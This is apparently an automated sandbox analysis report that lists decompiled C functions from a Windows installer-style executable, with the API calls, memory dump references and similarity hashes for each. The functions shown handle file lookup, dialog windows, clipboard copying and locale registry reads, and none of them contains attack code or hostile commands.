Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x4302b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

FindFirstFileW.KERNELBASE(75B53420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNELBASE(00000000), ref: 0040688A

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040291a
0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0x10438
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
							__eflags =  *0x434f8c - _t156;
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x5c5bc4
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(00010438,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t146;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									L28:
									return E00404500(_a8, _t122, _a16);
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136) {
							_t146 =  *0x433ed8 - _t136; // 0x30424
							if(_t146 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t127, 4);
						goto L8;
					}
				}
			}

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, 0x440800) != 0) {
					L16:
					if(E00405F14(_t98, 0x440800) == 0) {
						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
